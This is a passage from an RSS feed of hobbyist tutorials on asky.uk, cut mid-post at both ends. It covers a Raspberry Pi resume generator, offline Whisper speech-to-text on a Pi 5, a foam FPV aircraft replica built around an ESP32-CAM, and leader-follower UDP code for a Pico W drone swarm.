&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Open your browser at &lt;code&gt;http://localhost:7860&lt;/code&gt;&lt;/p&gt;&lt;h2&gt;Step 7: Optional - Make It Public&lt;/h2&gt;&lt;p&gt;Use &lt;a rel="nofollow" href="https://ngrok.com"&gt;ngrok&lt;/a&gt; or &lt;a rel="nofollow" href="https://www.npmjs.com/package/localtunnel"&gt;localtunnel&lt;/a&gt; to share your local Pi app with the world.&lt;/p&gt;&lt;p&gt;Example with localtunnel:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;npx localtunnel --port 7860
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;Final Tips&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;You can replace &lt;code&gt;distilgpt2&lt;/code&gt; with any other small language model for more detailed results.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add a "Download as PDF" button using &lt;code&gt;pdfkit&lt;/code&gt; or &lt;code&gt;reportlab&lt;/code&gt; for resume export.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Consider adding language selection for multi-lingual CVs.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h2&gt;Future Enhancements&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Add support for uploading an existing resume and improving it&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Integrate with job boards or LinkedIn scraping&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add image/logo or AI-generated portrait with Stable Diffusion&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;p&gt;&lt;img alt="" src="https://careercompanion.cv-creator.com/theme/Cakestrap/img/logo.jpg" style="height:158px; width:297px"&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/94/build-an-ai-resume-cv-generator-on-raspberry-pi</guid>
<pubDate>Sat, 19 Jul 2025 19:59:30 +0000</pubDate>
</item>
<item>
<title>Run Whisper Speech-to-Text on Raspberry Pi 5</title>
<link>https://asky.uk/93/run-whisper-speech-to-text-on-raspberry-pi-5</link>
<description>&lt;h1&gt;How to Run Whisper AI Speech-to-Text on Raspberry Pi 5 (Offline)&lt;/h1&gt;&lt;p&gt;&lt;strong&gt;Contents:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;✅ What is Whisper?&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ How it works on Raspberry Pi 5&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ Step-by-step installation&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ Record your voice&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ Transcribe with Whisper&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ Optimization tips&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ Test result&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;What is Whisper?&lt;/h2&gt;&lt;p&gt;Whisper is a powerful &lt;strong&gt;AI model for converting speech to text&lt;/strong&gt;, created by OpenAI. It supports over 90 languages and can work &lt;strong&gt;entirely offline&lt;/strong&gt; thanks to &lt;a rel="nofollow" href="https://github.com/ggerganov/whisper.cpp"&gt;whisper.cpp&lt;/a&gt; – a C/C++ port of the original model optimized for low-resource devices like Raspberry Pi.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://nolongerset.com/content/images/2025/04/ultra_realistic_im_image.jpg" style="height:547px; width:980px"&gt;&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;Requirements&lt;/h2&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Component&lt;/th&gt;&lt;th&gt;Recommended&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Raspberry Pi 5&lt;/td&gt;&lt;td&gt;4GB or 8GB RAM ✅&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Microphone&lt;/td&gt;&lt;td&gt;USB or 3.5mm Jack&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;OS&lt;/td&gt;&lt;td&gt;Raspberry Pi OS 64-bit&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Internet&lt;/td&gt;&lt;td&gt;Only during installation&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;hr&gt;&lt;h2&gt;Step 1: Install Dependencies&lt;/h2&gt;&lt;pre&gt;sudo apt update
sudo apt install git build-essential cmake python3-pip portaudio19-dev ffmpeg -y
&lt;/pre&gt;&lt;p&gt;Clone and build whisper.cpp:&lt;/p&gt;&lt;pre&gt;git clone https://github.com/ggerganov/whisper.cpp
cd whisper.cpp
make
&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;Step 2: Download the tiny.en model (~75MB)&lt;/h2&gt;&lt;pre&gt;./models/download-ggml-model.sh tiny.en
&lt;/pre&gt;&lt;blockquote&gt;&lt;p&gt;This is the &lt;strong&gt;fastest&lt;/strong&gt; and most suitable model for Raspberry Pi 5.&lt;/p&gt;&lt;/blockquote&gt;&lt;hr&gt;&lt;h2&gt;️ Step 3: Record 10 seconds of audio&lt;/h2&gt;&lt;p&gt;Use arecord:&lt;/p&gt;&lt;pre&gt;arecord -D plughw:1,0 -f cd -t wav -d 10 -r 16000 test.wav
&lt;/pre&gt;&lt;p&gt;To find your device name:&lt;/p&gt;&lt;pre&gt;arecord -l
&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;Step 4: Transcribe the audio with Whisper&lt;/h2&gt;&lt;pre&gt;./main -m models/ggml-tiny.en.bin -f test.wav -otxt
&lt;/pre&gt;&lt;p&gt;This will produce test.wav.txt containing the recognized speech.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;Tips for Better Performance&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Always use &lt;strong&gt;tiny.en&lt;/strong&gt; model for speed&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Disable GUI / run in CLI mode (raspi-config → Boot to CLI)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use class 10 U3 microSD or USB SSD for better I/O&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;Example Result&lt;/h2&gt;&lt;pre&gt;[00:00:00.000 --&amp;gt; 00:00:05.000] Hello, this is a test of the Whisper AI on Raspberry Pi 5.
&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;✅ You're Ready!&lt;/h2&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/93/run-whisper-speech-to-text-on-raspberry-pi-5</guid>
<pubDate>Sat, 19 Jul 2025 14:54:30 +0000</pubDate>
</item>
<item>
<title>How to build a Mini FPV Piaggio P.180 Avanti Replica with ESP32</title>
<link>https://asky.uk/92/how-to-build-a-mini-fpv-piaggio-180-avanti-replica-with-esp32</link>
<description>&lt;p&gt;This guide will walk you through the step-by-step process of building a compact, lightweight FPV-capable replica of the Piaggio P.180 Avanti aircraft. The build focuses on using inexpensive components like foam (e.g., styrofoam or depron), brushed motors, an ESP32-CAM module for FPV, and basic control via coil actuators or dual-motor thrust vectoring. The aim is to create a functional, minimalist FPV plane using microcontrollers and camera modules that can be controlled via a smartphone.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://i.ibb.co/jkzDQtCM/foam-fun.png" style="height:866px; width:866px"&gt;&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;Table of Contents&lt;/h2&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Introduction&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Materials and Components&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Airframe Design and Construction&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Electronics Integration&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Motor and Actuator Setup&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;FPV System Configuration&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Power Supply and Battery Mounting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Weight Optimization&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Testing and Calibration&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Flying and Controls&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Future Upgrades&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Safety Notes&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr&gt;&lt;h2&gt;1. Introduction&lt;/h2&gt;&lt;p&gt;The Piaggio P.180 Avanti is an Italian twin turboprop aircraft known for its unique canard configuration and rear-mounted pushing propellers. 
In this miniature foam replica, we aim to capture its basic shape and unique look while enabling real-time FPV control.&lt;/p&gt;&lt;p&gt;Goals:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Lightweight foam airframe (&amp;lt; 70g total)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;ESP32-CAM FPV streaming to phone&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Basic two-channel control (e.g., rudder + elevator or dual motor thrust)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Simplified build with minimal parts&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;2. Materials and Components&lt;/h2&gt;&lt;h3&gt;Electronics:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;ESP32-CAM&lt;/strong&gt; (for FPV stream)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;ESP32 Dev Module / RP2040 with ESP8285&lt;/strong&gt; (for control logic)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;DRV8833&lt;/strong&gt; motor driver&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;2x brushed motors (6 mm or 7 mm)&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;2x 65 mm propellers&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;LiPo Battery&lt;/strong&gt;: 3.7V 300–500 mAh&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Coil actuators x2&lt;/strong&gt; (optional, for canards or rudder)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Frame and Structure:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Foam board / depron / insulation foam / foam trays&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Carbon rods or skewers&lt;/strong&gt; (for reinforcement)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hot glue, UHU Por, or foam-safe CA glue&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Utility knife, ruler, pencil&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Optional:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Mobile app for viewing ESP32-CAM stream (e.g., MJPEG 
Viewer)&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Voltage regulator (if needed for ESP32/Camera)&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;3. Airframe Design and Construction&lt;/h2&gt;&lt;p&gt;The P.180 Avanti layout includes a forward canard, mid-fuselage wing, and rear pusher propeller(s). We'll approximate this layout using lightweight foam.&lt;/p&gt;&lt;h3&gt;Fuselage:&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Cut a fuselage body (approx. 25–30 cm long) with a rounded nose.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Hollow out or layer foam to leave space for electronics.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Reinforce the fuselage with a carbon spar.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;h3&gt;Wings:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Mid-wing of approx. 20–25 cm span, slightly swept back.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add dihedral for stability.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Canards:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Small forward-mounted canards (5–7 cm span)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Controlled via coil actuator or fixed angle.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Mounting:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Leave compartment for battery and microcontroller access.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Design for easy access to the ESP32-CAM for angle adjustments.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;4. 
Electronics Integration&lt;/h2&gt;&lt;h3&gt;Wiring Layout:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Power the ESP32-CAM and controller via the same LiPo battery (regulated if needed).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Connect motor outputs to DRV8833, and control inputs to the microcontroller.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;If using coil actuators, connect via GPIOs with transistor drivers.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Placement:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Place heavy components (battery, motor) as close to the center of gravity (CG) as possible.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Mount camera facing forward through a small cutout.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;5. Motor and Actuator Setup&lt;/h2&gt;&lt;h3&gt;Option A: Twin motor thrust control&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Mount two motors on the rear of the fuselage in pusher configuration.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Vary motor speeds for turning (differential thrust).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Option B: One motor + coil actuators&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use a single pusher motor.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add two coil actuators to move canards or rudder/elevator.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;DRV8833 can drive both brushed motors and coil actuators.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;6. FPV System Configuration&lt;/h2&gt;&lt;p&gt;ESP32-CAM can broadcast live video over Wi-Fi.&lt;/p&gt;&lt;h3&gt;Steps:&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Flash the ESP32-CAM with MJPEG streaming sketch.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Connect to its Wi-Fi access point with a smartphone.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Open MJPEG stream in a browser or app.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Mount the camera module in the front of the plane.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr&gt;&lt;h2&gt;7. 
Power Supply and Battery Mounting&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use a 3.7V 300–500 mAh LiPo battery.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Keep it centered for balance.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;If necessary, use a buck/boost regulator for 5V components.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Estimated power usage:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Motors: ~1–2A each under load&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;ESP32-CAM: ~200–250 mA during streaming&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Control board: ~100 mA&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;8. Weight Optimization&lt;/h2&gt;&lt;p&gt;Target total weight: 50–70 grams&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use the lightest possible foam.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Avoid long wires; keep layout compact.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Consider 6 mm brushed motors over 7 mm.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use one motor if thrust is sufficient.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Remove unused camera features (e.g., flash LED).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;9. Testing and Calibration&lt;/h2&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Test each electronic component before embedding it.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Balance the plane on its CG point (roughly 1/3 wing chord).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Calibrate motor thrust to ensure liftoff is possible.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Stream FPV video and verify quality and latency.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr&gt;&lt;h2&gt;10. 
Flying and Controls&lt;/h2&gt;&lt;h3&gt;Control Methods:&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use ESP32 to control motors via Wi-Fi or preprogrammed logic.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use a Bluetooth joystick or mobile app (optional).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Launch tips:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Hand-launch in calm wind.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Keep first flights short.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Monitor FPV stream and battery.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;11. Future Upgrades&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Add gyro for stabilization (MPU6050 or similar)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add GPS for telemetry&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use larger battery or solar cell for more endurance&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Integrate OTA updates for ESP32&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add full servo-based control surfaces&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;12. Safety Notes&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Always fly in an open area.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Avoid flying near people or animals.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Check battery and propellers before every flight.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Monitor temperatures and ensure ESP32 doesn’t overheat.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;p&gt;This build is a fantastic mix of creativity, electronics, and aerodynamics. It proves that even microcontrollers and foam can achieve functional FPV flight. The result is a charming, functional miniature replica of the Piaggio P.180 Avanti.&lt;/p&gt;&lt;p&gt;Let your mini Avanti soar!&lt;/p&gt;&lt;hr&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Download code &lt;a rel="nofollow" href="http://asky.uk/Downloads/drone_full_code.rtf"&gt;&lt;strong&gt;HERE&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;</description>
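Option A above steers by varying the speeds of the two rear pusher motors. A minimal sketch of the throttle/yaw-to-motor mixing (plain Python; the function name and the 0.5 yaw gain are illustrative assumptions, not from the original build):

```python
def mix_differential_thrust(throttle, yaw):
    """Map throttle (0..1) and yaw (-1..1, positive = turn right)
    to (left, right) motor duty cycles, clamped to 0..1."""
    def clamp(v):
        return max(0.0, min(1.0, v))
    # To yaw right, speed up the left motor and slow the right one.
    return clamp(throttle + 0.5 * yaw), clamp(throttle - 0.5 * yaw)

# Straight and level at 60% throttle: both motors equal.
print(mix_differential_thrust(0.6, 0.0))  # (0.6, 0.6)
# Hard right: left motor saturates, right motor backs off.
print(mix_differential_thrust(0.5, 1.0))  # (1.0, 0.0)
```

On the real airframe these duty values would be fed to the DRV8833 inputs as PWM (e.g., via `machine.PWM` in MicroPython), and the yaw gain would be tuned in flight tests.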
<category>ESP32 / ESP32 Zero</category>
<guid isPermaLink="true">https://asky.uk/92/how-to-build-a-mini-fpv-piaggio-180-avanti-replica-with-esp32</guid>
<pubDate>Sat, 19 Jul 2025 11:13:44 +0000</pubDate>
<enclosure length="13029" type="application/rtf" url="http://asky.uk/Downloads/drone_full_code.rtf"/><itunes:explicit/><itunes:subtitle>A step-by-step guide to building a compact, lightweight FPV-capable foam replica of the Piaggio P.180 Avanti using an ESP32-CAM, brushed motors, and a DRV8833 driver, controlled from a smartphone.</itunes:subtitle><itunes:summary>This guide walks you through building a compact, lightweight FPV-capable replica of the Piaggio P.180 Avanti aircraft. The build focuses on inexpensive components such as foam (e.g., styrofoam or depron), brushed motors, an ESP32-CAM module for FPV, and basic control via coil actuators or dual-motor differential thrust. The aim is a functional, minimalist FPV plane using microcontrollers and camera modules that can be controlled via a smartphone. Full code is available from the enclosure link.</itunes:summary><itunes:keywords>ESP32 / ESP32 Zero</itunes:keywords></item>
<item>
<title>Creating a Swarm of Drones with Raspberry Pi Pico W and MicroPython</title>
<link>https://asky.uk/79/creating-swarm-drones-with-raspberry-pico-and-micropython</link>
<description>&lt;h2&gt;Introduction&lt;/h2&gt;&lt;p&gt;Building a drone swarm is no longer a concept reserved for large military or research institutions. With affordable hardware like the &lt;strong&gt;Raspberry Pi Pico W&lt;/strong&gt;, hobbyists and developers can experiment with &lt;strong&gt;coordinated multi-agent systems&lt;/strong&gt; using &lt;strong&gt;MicroPython&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;In this article, we'll explore:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;The hardware needed for a swarm of drones.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;How to set up communication using Wi-Fi (UDP).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Leader-follower swarm logic.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Example code for both &lt;strong&gt;leader&lt;/strong&gt; and &lt;strong&gt;follower&lt;/strong&gt; drones.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;Hardware Requirements&lt;/h2&gt;&lt;p&gt;Each drone in the swarm should have:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Raspberry Pi Pico W&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Motor controller (ESC)&lt;/strong&gt; for brushless motors&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;EDF or propeller with BLDC motor&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;IMU (e.g., MPU6050)&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Optional&lt;/strong&gt;: GPS module (e.g., M10Q), barometer (e.g., BMP280), or airspeed sensor&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;LiPo battery (3.7V or higher)&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Frame&lt;/strong&gt; (custom 3D-printed or carbon fiber)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Note: This article assumes that basic drone flight control (ESC control, stabilization) is implemented or handled by another module. Here, we focus purely on &lt;strong&gt;swarm coordination logic&lt;/strong&gt; using MicroPython.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;Communication via UDP Broadcast (Pico W)&lt;/h2&gt;&lt;p&gt;We'll use &lt;strong&gt;UDP broadcast messages&lt;/strong&gt; over Wi-Fi for communication between drones.&lt;/p&gt;&lt;h3&gt;Network Setup&lt;/h3&gt;&lt;p&gt;Each Pico W connects to the same Wi-Fi network (or one acts as an access point). They communicate by broadcasting position data (X, Y, Z) and commands.&lt;/p&gt;&lt;h2&gt;MicroPython Firmware&lt;/h2&gt;&lt;p&gt;Install MicroPython firmware on each Raspberry Pi Pico W.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Flash it from &lt;a rel="noopener" target="_new" href="https://micropython.org/download/rp2-pico-w/"&gt;https://micropython.org/download/rp2-pico-w/&lt;/a&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;Then, use &lt;strong&gt;Thonny&lt;/strong&gt; or &lt;strong&gt;rshell&lt;/strong&gt; to upload the scripts below.&lt;/p&gt;&lt;h2&gt;1️⃣ Leader Drone Code&lt;/h2&gt;&lt;p&gt;This drone sends its current position and a command every 0.5 seconds.&lt;/p&gt;&lt;pre&gt;# leader.py
import network
import socket
import time

SSID = 'YourWiFi'
PASSWORD = 'YourPassword'
PORT = 5005
BROADCAST_IP = '255.255.255.255'

def connect():
    wlan = network.WLAN(network.STA_IF)
    wlan.active(True)
    wlan.connect(SSID, PASSWORD)
    while not wlan.isconnected():
        print("Connecting...")
        time.sleep(1)
    print("Connected to", SSID)
    print("IP:", wlan.ifconfig())

def send_command():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    while True:
        # Simulated coordinates (you can read from sensors)
        x, y, z = 10, 20, 5
        msg = f"{x},{y},{z},FOLLOW"
        s.sendto(msg.encode(), (BROADCAST_IP, PORT))
        print("Sent:", msg)
        time.sleep(0.5)

connect()
send_command()&lt;/pre&gt;&lt;h2&gt;2️⃣ Follower Drone Code&lt;/h2&gt;&lt;p&gt;Each follower receives the command and adjusts its own course to match or follow the leader.&lt;/p&gt;&lt;pre&gt;# follower.py
import network
import socket
import time

SSID = 'YourWiFi'
PASSWORD = 'YourPassword'
PORT = 5005

def connect():
    wlan = network.WLAN(network.STA_IF)
    wlan.active(True)
    wlan.connect(SSID, PASSWORD)
    while not wlan.isconnected():
        print("Connecting...")
        time.sleep(1)
    print("Connected to", SSID)
    print("IP:", wlan.ifconfig())

def listen():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind(('0.0.0.0', PORT))
    while True:
        data, addr = s.recvfrom(1024)
        msg = data.decode()
        print("Received:", msg)
        try:
            x, y, z, cmd = msg.split(',')
            # Simulated response: just print for now
            print(f"Following leader to X={x}, Y={y}, Z={z}")
            # Here you would command motors or a PID loop
        except Exception as e:
            print("Error parsing message:", e)

connect()
listen()&lt;/pre&gt;&lt;h2&gt;Behavior Logic – Follow-the-Leader&lt;/h2&gt;&lt;p&gt;To expand this swarm logic, implement simple behaviors like:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Maintain a fixed offset from the leader (&lt;code&gt;dx&lt;/code&gt;, &lt;code&gt;dy&lt;/code&gt;)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Collision avoidance (future)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Priority rules (e.g., time delay between followers)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;pre&gt;# Within follower.py
offset_x = -5  # stay 5 meters behind
target_x = float(x) + offset_x
